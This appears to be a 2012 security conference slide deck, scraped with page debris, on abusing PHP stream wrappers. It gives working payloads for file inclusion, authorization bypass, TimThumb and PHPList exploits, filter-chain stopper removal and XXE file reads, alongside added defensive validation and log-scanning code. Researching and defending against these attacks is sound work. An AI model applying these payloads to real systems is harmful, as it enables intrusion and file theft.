PHP Wrappers

Aleksey Moskvin
Positive Technologies
May 2012
Streams

    [Diagram: Streams, Wrappers]

Data reading

$contents = '';
$handle = fopen($file, "rb");
while (!feof($handle)) {
    $contents .= fread($handle, 8192);
}
fclose($handle);



You can get data not only from local files!

$file = 'ftp://user:password@10.0.0.1/pub/file.txt';

$file = 'http://127.0.0.1/server-status';

$file = 'php://fd/XXX';

$file = 'expect://ls';
Data writing

    Read the file

copy('/etc/passwd', 'php://output');

file_put_contents('php://output', file_get_contents('/etc/hosts'));


    Modify the file, and then write it to the disk


move_uploaded_file($_FILES["attach"]["tmp_name"],
                   "php://filter/string.rot13/resource=./upload/user_attach");


    Write data into the Apache error_log (PHP >= 5.3.6)

error_log('Bypass root perm!', 3, 'php://fd/2');
Wrapper zip://


     Requirements: PHP is compiled with zip support.

     The zip:// wrapper can be used even when allow_url_fopen = Off.

     The zip:// wrapper gives access to a file inside an archive, and the archive itself can
     have an arbitrary name.



$zip = new ZipArchive;

if ($zip->open('/tmp/any_name_zip_arxiv', ZipArchive::CREATE)) {
    $zip->addFromString('/my/header.html', '<?php print_r(ini_get_all());');
}
$zip->close();

print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
NULL Byte Replacement

 $s = $_POST['path'];
 include $s.'/header.html';



     The allow_url_include directive restricts the use of the http://, ftp:// and data:// wrappers
     in includes.

     The magic_quotes_gpc directive prevents the use of a NULL byte to truncate the path in a
     local file include.

     If you can create a zip archive, you can use the zip:// wrapper instead:
path=zip:///tmp/any_name_zip_arxiv#/my

This works even when allow_url_fopen=Off and magic_quotes_gpc=On.

     Because the archive name is arbitrary, temporary files created during uploads can serve
     as the archive.
Use phpinfo() to get the temporary file path:
https://rdot.org/forum/showthread.php?t=1134
Wrapper data:// (RFC 2397)




    According to RFC 2397, the data:// wrapper supports an extended syntax:

    dataurl   := "data:" [ mediatype ] [ ";base64" ] "," data
    mediatype := [ type "/" subtype ] *( ";" parameter )
    data      := *urlchar
    parameter := attribute "=" value

    Wrapper feature: the mediatype may be absent or may be filled with arbitrary values:

data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
Trick: function stream_get_meta_data




Modify array items returned by stream_get_meta_data

 $password = 'secret';
 $file = $_POST['file'];
 $fp = fopen( $file, 'r');
 extract(stream_get_meta_data($fp));
 if ( $mediatype === 'text/plain') { ... }
 if ( $_COOKIE['admin'] === $password) { ... }


Rewrite $password variable
POST DATA: file=data://text/plain;password=mysecret;base64,
Bypass authorization: Cookie: admin=mysecret
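The two vulnerable patterns above (including a user-supplied path and extract()ing stream metadata) share one fix: make sure the opened stream is a plain local file. The following is an added example, not code from the talk; the function names, the templates directory and the sample inputs are assumptions for this demo.

```php
<?php
// Added example, not from the slides: a hardened replacement for
//   include $_POST['path'].'/header.html';
// and for extract(stream_get_meta_data($fp)). Function names, the
// templates directory and the sample inputs are assumptions for this demo.
declare(strict_types=1);

// Resolve a user-supplied relative path to a real file below $baseDir.
// Returns the canonical path, or null when the input must not be opened.
function resolve_local_path(string $baseDir, string $userPath): ?string
{
    // 1. NUL bytes: without magic_quotes_gpc a %00 truncates the path.
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    // 2. Anything shaped like a URI scheme (zip:, data:, php:, compress.zlib:)
    //    would select a stream wrapper instead of a file. RFC 3986 scheme syntax.
    if (preg_match('~^[a-z][a-z0-9+.-]*:~i', $userPath)) {
        return null;
    }
    // 3. Canonicalise and confine to the base directory. realpath() also
    //    returns false for wrapper URLs, so it doubles as a second guard.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $userPath);
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // escaped the base via ../
    }
    // 4. is_file() is false for directories and for wrapper paths.
    return is_file($real) ? $real : null;
}

// Open a confined file and verify the stream really is a plain file.
// Metadata stays in a named array; nothing is extract()ed into scope.
function open_plain_file(string $baseDir, string $userPath)
{
    $path = resolve_local_path($baseDir, $userPath);
    if ($path === null) {
        return null;
    }
    $fp = fopen($path, 'rb');
    if ($fp === false) {
        return null;
    }
    $meta = stream_get_meta_data($fp);
    // A local file reports wrapper_type "plainfile"; data:, zip: and
    // php://filter streams report something else. Only known keys are read.
    if (($meta['wrapper_type'] ?? '') !== 'plainfile') {
        fclose($fp);
        return null;
    }
    return $fp;
}

// Constructed demo: a templates directory holding one header file.
$tmp = sys_get_temp_dir() . '/wrapper_demo_' . bin2hex(random_bytes(4));
mkdir($tmp . '/templates', 0700, true);
file_put_contents($tmp . '/templates/header.html', "<h1>hello</h1>\n");

$inputs = [
    'header.html',                                   // legitimate
    "header.html\0/ignored",                         // NUL-byte truncation
    'zip:///tmp/any_name_zip_arxiv#/my/header.html', // wrapper instead of file
    'data://text/plain;password=x;base64,',          // data: wrapper
    '../../etc/hosts',                               // traversal out of base
];
foreach ($inputs as $in) {
    $fp = open_plain_file($tmp . '/templates', $in);
    printf("%-48s => %s\n", addcslashes($in, "\0"), $fp ? 'opened' : 'rejected');
    if ($fp) {
        fclose($fp);
    }
}
unlink($tmp . '/templates/header.html');
rmdir($tmp . '/templates');
rmdir($tmp);
```

Only the first input is opened; the scheme check, realpath() confinement and the wrapper_type test each reject a different class of the inputs shown on the previous slides.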
Wrapper compress.zlib://

    The compress.zlib:// wrapper returns an ordinary (uncompressed) file unchanged

 readfile('compress.zlib:///etc/hosts');

    The local file path can include arbitrary folder names



 $url = 'compress.zlib:///http://../etc/hosts';
 if (preg_match('/http:\/\//', $url) == true) {
     echo "Yes!";
 }
Any Data in parse_url


     The parse_url function accepts more than just URLs

$src = $_POST['src'];
$url_info = parse_url($src);

if ($url_info['host'] === 'img.youtube.com') {
    $name = str_replace('/', '', substr($url_info['path'], 4));
    copy($src, './' . $name);
}

    Loading images from img.youtube.com:
POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg

    Bypass the host name check and create arbitrary files:
POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo

    Local file manipulation:
POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
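The host check above fails because parse_url() reports host=img.youtube.com for data:// and compress.zlib:// inputs too. As an added example (not from the slides), the same check with a scheme allowlist and a strict path pattern; the function name, the allowlist and the thumbnail pattern are assumptions.

```php
<?php
// Added example, not from the slides: validating the remote image URL so the
// host check cannot be satisfied by data:// or compress.zlib:// inputs.
// The function name, the allowlist and the path pattern are assumptions.
declare(strict_types=1);

// Accept only http(s) URLs whose host is exactly one of $allowedHosts and
// whose path looks like a YouTube thumbnail. Returns the clean URL or null.
function validate_image_url(string $src, array $allowedHosts): ?string
{
    // parse_url() happily parses "data://img.youtube.com/..." and reports
    // host=img.youtube.com, so the host alone says nothing about the scheme.
    $u = parse_url($src);
    if ($u === false || !isset($u['scheme'], $u['host'])) {
        return null;
    }
    // The scheme allowlist is the check the original code lacked.
    if (!in_array(strtolower($u['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // No credentials or ports; host must match exactly (case-insensitive).
    if (isset($u['user']) || isset($u['pass']) || isset($u['port'])) {
        return null;
    }
    if (!in_array(strtolower($u['host']), $allowedHosts, true)) {
        return null;
    }
    // Path must be a thumbnail name: no traversal, no wrapper syntax.
    $path = $u['path'] ?? '';
    if (!preg_match('~^/vi/[A-Za-z0-9_-]{1,32}/\d{1,2}\.jpg$~', $path)) {
        return null;
    }
    return strtolower($u['scheme']) . '://' . strtolower($u['host']) . $path;
}

// Constructed inputs: the three POST values from the slide plus a traversal.
$cases = [
    'http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg',
    'data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo',
    'compress.zlib://img.youtube.com/../path/to/local/file;',
    'http://img.youtube.com/../../etc/passwd',
];
foreach ($cases as $c) {
    $ok = validate_image_url($c, ['img.youtube.com']);
    printf("%-60s => %s\n", $c, $ok === null ? 'rejected' : 'accepted');
}
```

Only the first case is accepted; the second and third are stopped by the scheme allowlist alone, the fourth by the path pattern.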
Bypass preg_match validate


      Filter bypass based on preg_match

POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo

POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file




function validate_url($url)
{
    $pattern = "/\b(?:(?:https?):\/\/|www\.)[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i";
    return preg_match($pattern, $url);
}

$src = $_POST['src'];

if (!validate_url($src)) display_error('invalid url');
Arbitrary File Loading in TimThumb

      TimThumb is a popular script used for image resizing.
 Public exploit for v1.32 (08/2011): http://www.exploit-db.com/exploits/17602
 New wrappers exploit for v1.34 (revision 145)
 function check_external ($src) {
    ...
    if (!validate_url ($src)) display_error ('invalid url');
    $url_info = parse_url ($src);
    ...
    if ($url_info['host'] == 'www.youtube.com' || ...) parse_str($url_info['query']);
    ...
    $fh = fopen($local_filepath, 'w');
    $ch = curl_init($src);
    ...
    $file_infos = getimagesize ($local_filepath);

    if (empty($file_infos['mime']) || ...) unlink($local_filepath);
    ...


 http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php
 &url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
File Manipulation in TimThumb v1.35

     Requirements: the curl_init function is disabled on the target server.

 ...
 if (!$img = file_get_contents ($src)) {
     display_error ('error....');
 }
 if (file_put_contents ($local_filepath, $img) == FALSE) {
     display_error ('error.....');
 }
 ...


     Create a file with arbitrary content:
data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo

"Read" a local file:

compress.zlib://youtube.com/../http://?/../../path/to/local/file
Secret features of php://filter wrapper

      php://filter applies stream filters while a stream is being opened.

Filter the file content:

 readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php');



      An unknown filter does not influence the results of the other filters.

      The convert.base64-decode and string.strip_tags filters can delete data from the
      stream.
Stefan Esser used the behaviour of the convert.base64-decode filter in an exploit for Piwik in 2009:
http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability



 Since 2009, two important questions have remained open:
      How to delete "unused" data?
      What advantages do the filters offer?
Base64 algorithm: encoding

    RFC 2045, section 6.8 describes the Base64 algorithm.

    Base64 alphabet:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Base64 algorithm: decoding

   While decoding, only characters of the base64 alphabet are handled.

   The input string is divided into groups of 4 characters, and each group is handled
   separately.
Example: "Extrusion" of a stopper

     You can delete some data by applying base64_decode several times.



$content  = "; <? die; ?>\n";
$content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]\n";
$file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode'
      . '/resource=./PoC';
file_put_contents($file, $content);


   "Stub": /Ly8v ( base64_decode('Ly8v') == '///' )

     The convert.base64-decode filter does not handle strings with an equal sign in the middle.




$s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP';
var_dump(file_get_contents($s)); // print: string(0) ""
Filter string.strip_tags

      The string.strip_tags filter speeds up the "extrusion" process


 $content  = "; <? die; ?>\n";
 $content .= "=3C=3Fprint('PHP');\n";
 $file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC';
 file_put_contents($file, $content);

       The convert.quoted-printable-decode filter handles the string symbol by symbol.
Characters in Quoted-Printable format (RFC 2045, section 6.7) are converted into characters of an
8-bit code page.

Conversion into Quoted-Printable format:


  $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C

       The convert.quoted-printable-decode filter fails if the string contains an equal sign that is
not followed by a hexadecimal character code.


$s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP';
var_dump(file_get_contents($s)); // print: string(0) ""
TextPattern: Upload Arbitrary Files (I)




      A file with a .php extension stores information about comment authors.


 $file = $prefs['tempdir'].DS.'evaluator_trace.php';
 if (!file_exists($file)) {
     $fp = fopen($file, 'wb');
     if ($fp)
         fwrite($fp, "<?php return; ?>\n".
             "This trace-file tracks saved comments. (created ".
             safe_strftime($prefs['archive_dateformat'],time()).")\n".
             "Format is: Type; Probability; Message ".
             "(Type can be -1 => spam, 0 => moderate, 1 => visible)\n\n");
 }
TextPattern: Upload Arbitrary Files (I)
Partial File Reading in PHPList <= 2.10.13 (I)

      The reason is the possibility of modifying the structure of the $_FILES array
http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/

if (is_array($_FILES)) { ## only avatars are files
    foreach ($_FILES['attribute']['name'] as $key => $val) {
        if (!empty($_FILES['attribute']['name'][$key])) {
            $tmpnam = $_FILES['attribute']['tmp_name'][$key];
            $size = $_FILES['attribute']['size'][$key];
            if ($size < MAX_AVATAR_SIZE) {
                $avatar = file_get_contents($tmpnam);
                Sql_Query(sprintf('replace into %s (userid,attributeid,value)
                    values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar)));
            }
        }
    }
}


      The following HTML form allows an attacker to upload files into the database.

<form action="http://localhost/lists/admin/?page=user&id=1" method="POST"
      enctype="multipart/form-data">
<input type="file" name="attribute[tmp_name][">
<input type="file" name="attribute[size][">
<input type="file" name="attribute[[tmp_name]">
<input type="file" name="attribute[name][">
<input name="change" value="Save Changes" type="submit">
</form>
Partial File Reading in PHPList <= 2.10.13 (II)
getimagesize check bypass (I)
With filters, you can not only delete stoppers but also modify images that are checked with the
getimagesize function.

If you manage to inject data into EXIF image
getimagesize check bypass (II)

extract($_REQUEST);
...
include $templatedir.'/header.html';
...
if (!empty($_FILES)) {
    $file_info = getimagesize($_FILES['image']['tmp_name']);
    if ($file_info['mime'] == 'image/jpeg') {
        if (move_uploaded_file($_FILES['image']['tmp_name'], $folder.'/avatar.jpg'))
        ...



     Upload an image, but what is stored on the server is a zip archive containing the file
/my/header.html.
folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/

      Include the file from the zip archive:

templatedir=zip:///tmp/avatar.jpg#/my
Files with arbitrary content




If you manage to create a file with arbitrary content, you can:

     create a session file and exploit the unserialize bug via session_start();

     create a zip archive and exploit RFI;

     create or rewrite .htaccess/.htpasswd files;

     create or rewrite templates.
parse_ini_file attack

      The parse_ini_file function handles local files only.

session_start();
$_SESSION['admin'] = $_POST['name'];
...
$var = parse_ini_file($inifile);
require $var['require'];



      Create the session file /tmp/sess_dffdsdf24gssdgsd90:

admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5"


     With filters, transform the session file into a format suitable for the parse_ini_file
function:

php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/tmp/sess_dffdsdf24gssdgsd90
XXE Attack


     Read files via XML injection.


<?xml version='1.0'?>
<!DOCTYPE scan [
  <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1/server-status">
]>
<scan>&test;</scan>


     The simplexml_load_file function and the DOMDocument::load method support wrappers.
Limitations for the usage of wrappers




    By default, with Suhosin installed you are not allowed to use wrappers in includes
    (even if allow_url_include = On).

 For example, the zip:// wrapper becomes available as soon as the whitelist includes it:



 suhosin.executor.include.whitelist = "zip"

    The file_exists, is_file and filesize functions return FALSE when wrapper paths (php://filter,
    zip://, data://) are used as file names.
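On the detection side, the wrapper schemes covered in this talk are easy to spot in request parameters once the values are URL-decoded. The following is an added example, not part of the talk: an access-log scanner in PHP; the log lines are constructed for the demo and the scheme list is an assumption drawn from the wrappers discussed above.

```php
<?php
// Added example, not from the slides: a log-side detector for stream-wrapper
// syntax and NUL bytes in request parameters. The log lines are constructed
// for the demo; the scheme list is an assumption based on this talk.
declare(strict_types=1);

const WRAPPER_SCHEMES = ['php', 'zip', 'data', 'compress.zlib', 'compress.bzip2',
                         'expect', 'phar', 'glob', 'ftp', 'ftps', 'ssh2'];

// Return the wrapper schemes found in one parameter value. The value is
// URL-decoded twice because "://" and "%00" are often double-encoded.
function find_wrapper_schemes(string $value): array
{
    $decoded = rawurldecode(rawurldecode($value));
    $found = [];
    // "scheme:" not preceded by a scheme character; http/https are not
    // listed, so an ordinary remote image URL does not trigger an alert.
    if (preg_match_all('~(?<![a-z0-9.+-])([a-z][a-z0-9.+-]*):~i', $decoded, $m)) {
        foreach ($m[1] as $scheme) {
            $scheme = strtolower($scheme);
            if (in_array($scheme, WRAPPER_SCHEMES, true)) {
                $found[$scheme] = true;
            }
        }
    }
    return array_keys($found);
}

// Scan one combined-format access log line: take the quoted request target,
// split its query string and flag suspicious parameter values.
function scan_log_line(string $line): array
{
    if (!preg_match('~"(?:GET|POST|PUT) (\S+) HTTP/~', $line, $m)) {
        return [];
    }
    // The target starts with "/", so parse_url() treats it as path + query.
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    $alerts = [];
    foreach (explode('&', $query) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $name = rawurldecode($name);
        $schemes = find_wrapper_schemes($value);
        if ($schemes !== []) {
            $alerts[] = sprintf('param %s uses wrapper(s): %s', $name, implode(',', $schemes));
        }
        if (strpos(rawurldecode(rawurldecode($value)), "\0") !== false) {
            $alerts[] = sprintf('param %s contains a NUL byte', $name);
        }
    }
    return $alerts;
}

// Constructed log lines: one benign request, one benign remote image URL,
// and payload shapes from this talk (zip://, php://filter, data://, %00).
$logLines = [
    '10.0.0.5 - - [10/May/2012:12:00:01 +0400] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/May/2012:12:00:02 +0400] "GET /index.php?path=zip:///tmp/any_name_zip_arxiv%23/my HTTP/1.1" 200 90',
    '10.0.0.5 - - [10/May/2012:12:00:03 +0400] "POST /upload.php?folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/ HTTP/1.1" 200 10',
    '10.0.0.5 - - [10/May/2012:12:00:04 +0400] "GET /img.php?src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg HTTP/1.1" 200 4096',
    '10.0.0.5 - - [10/May/2012:12:00:05 +0400] "GET /img.php?src=data%3A%2F%2Fimg.youtube.com%2Fa.php%3F%3Bbase64%2CSSBsb3ZlIFBIUAo HTTP/1.1" 200 12',
    '10.0.0.5 - - [10/May/2012:12:00:06 +0400] "GET /view.php?file=header.html%00 HTTP/1.1" 200 12',
];
foreach ($logLines as $line) {
    foreach (scan_log_line($line) as $alert) {
        echo $alert, "  <- ", substr($line, 46, 60), "...\n";
    }
}
```

The first and fourth lines produce no alert; the other four each produce one, naming the parameter and the scheme (or the NUL byte) involved.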
Thank you for your attention!

Questions?

Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 

On secure application of PHP wrappers

  • 1. PHP Wrappers. Aleksey Moskvin, Positive Technologies, May 2012
  • 2. Streams
  • 3. Data reading
    Wrappers
    $handle = fopen($file, "rb");
    while (!feof($handle))
    {
      $contents .= fread($handle, 8192);
    }
    fclose($handle);
    You can get data not only from local files!
    $file = 'ftp://user:password@10.0.0.1/pub/file.txt';
    $file = 'http://127.0.0.1/server-status';
    $file = 'php://fd/XXX';
    $file = 'expect://ls';
  • 4. Data writing
    Read the file
    copy('/etc/passwd', 'php://output');
    file_put_contents('php://output', file_get_contents('/etc/hosts'));
    Modify the file, and then write it to the disk
    move_uploaded_file($_FILES["attach"]["tmp_name"],
                       "php://filter/string.rot13/resource=./upload/user_attach");
    Write data into the Apache error_log (PHP >= 5.3.6)
    error_log('Bypass root perm!', 3, 'php://fd/2');
  • 5. Wrapper zip://
    Requirements: PHP is compiled with zip support.
    You can use the zip:// wrapper even if allow_url_fopen = Off.
    The zip:// wrapper allows you to access a file inside an archive that has an arbitrary name.
    $zip = new ZipArchive;
    if ($zip->open('/tmp/any_name_zip_arxiv', 1))
    {
      $zip->addFromString('/my/header.html', '<?php print_r(ini_get_all());');
    }
    $zip->close();
    print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
  • 6. NULL Byte Replacement
    $s = $_POST['path'];
    include $s.'/header.html';
    The allow_url_include directive restricts the usage of the http://, ftp:// and data:// wrappers.
    The magic_quotes_gpc directive restricts the usage of the NULL byte in local file includes.
    If you can create a zip archive, you can use the zip:// wrapper:
    path=zip:///tmp/any_name_zip_arxiv#/my
    This is effective if allow_url_fopen=Off and magic_quotes_gpc=On.
    An arbitrary archive name allows you to use the temporary files created while content is uploaded.
    Use phpinfo() to get the temporary file path:
    https://rdot.org/forum/showthread.php?t=1134
  • 7. Wrapper data:// (RFC 2397)
    According to RFC 2397, the data:// wrapper supports a more extended syntax:
    dataurl   := "data:" [ mediatype ] [ ";base64" ] "," data
    mediatype := [ type "/" subtype ] *( ";" parameter )
    data      := *urlchar
    parameter := attribute "=" value
    Wrapper feature: mediatype can be absent or can be filled in with arbitrary values:
    data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
  • 8. Trick: function stream_get_meta_data
    Modify the array items returned by stream_get_meta_data
    $password = 'secret';
    $file = $_POST['file'];
    $fp = fopen($file, 'r');
    extract(stream_get_meta_data($fp));
    if ($mediatype === 'text/plain') { ... }
    if ($_COOKIE['admin'] === $password) { ... }
    Rewrite the $password variable
    POST DATA: file=data://text/plain;password=mysecret;base64,
    Bypass authorization:
    Cookie: admin=mysecret
  • 9. Wrapper compress.zlib://
    The compress.zlib:// wrapper does not modify ordinary file content
    readfile('compress.zlib:///etc/hosts');
    The local file path can include arbitrary folder names
    $url = 'compress.zlib:///http://../etc/hosts';
    if (preg_match('/http:\/\//', $url) == true) { echo "Yes!"; }
  • 10. Any Data in parse_url
    The parse_url function handles not only URLs
    $src = $_POST['src'];
    $url_info = parse_url($src);
    if ($url_info['host'] === 'img.youtube.com')
    {
      $name = str_replace('/', '', substr($url_info['path'], 4));
      copy($src, './'.$name);
    }
    Loading images from img.youtube.com:
    POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg
    Bypass host name checks and create arbitrary files:
    POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo
    Local File Manipulation:
    POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
  • 11. Bypass preg_match validate
    Filter bypass based on preg_match
    POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo
    POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file
    function validate_url ($url)
    {
      $pattern = "/\b(?:(?:https?):\/\/|www\.)[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i";
      return preg_match ($pattern, $url);
    }
    $src = $_POST['src'];
    if (!validate_url ($src)) display_error ('invalid url');
  • 12. Arbitrary File Loading in TimThumb
    TimThumb is a popular script used for image resizing.
    Public Exploit for v1.32 (08/2011): http://www.exploit-db.com/exploits/17602
    New Wrappers Exploit for v1.34 (revision 145)
    function check_external ($src)
    {
      ...
      if (!validate_url ($src)) display_error ('invalid url');
      $url_info = parse_url ($src);
      ...
      if ($url_info['host'] == 'www.youtube.com' || ...)
        parse_str($url_info['query']);
      ...
      $fh = fopen($local_filepath, 'w');
      $ch = curl_init($src);
      ...
      $file_infos = getimagesize ($local_filepath);
      if (empty($file_infos['mime']) || ...) unlink($local_filepath);
      ...
    http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php&url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
  • 13. File Manipulation in TimThumb v1.35
    Requirements: the curl_init function is disabled on the target server.
    ...
    if (!$img = file_get_contents ($src))
    {
      display_error ('error....');
    }
    if (file_put_contents ($local_filepath, $img) == FALSE)
    {
      display_error ('error.....');
    }
    ...
    Create a file with arbitrary content:
    data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo
    «Read» a local file:
    compress.zlib://youtube.com/../http://?/../../path/to/local/file
  • 14. Secret features of the php://filter wrapper
    php://filter allows users to filter streams while opening them.
    Filter the file content:
    readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php');
    An unknown filter does not influence the results of the other filters.
    The convert.base64-decode and string.strip_tags filters can delete data from the stream.
    Stefan Esser used the convert.base64-decode filter features in an exploit for Piwik in 2009:
    http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability
    Since 2009, two important questions have not been solved:
    How to delete «unused» data?
    What are the advantages of filters?
  • 15. Base64 algorithm: encoding
    RFC 2045, section 6.8 describes the Base64 algorithm.
    Base64 alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  • 16. Base64 algorithm: decoding
    While decoding, only characters of the base64 alphabet are handled.
    The input string is divided into parts of 4 characters, and every part is handled separately.
  • 17. Example. "Extrusion" of a stopper
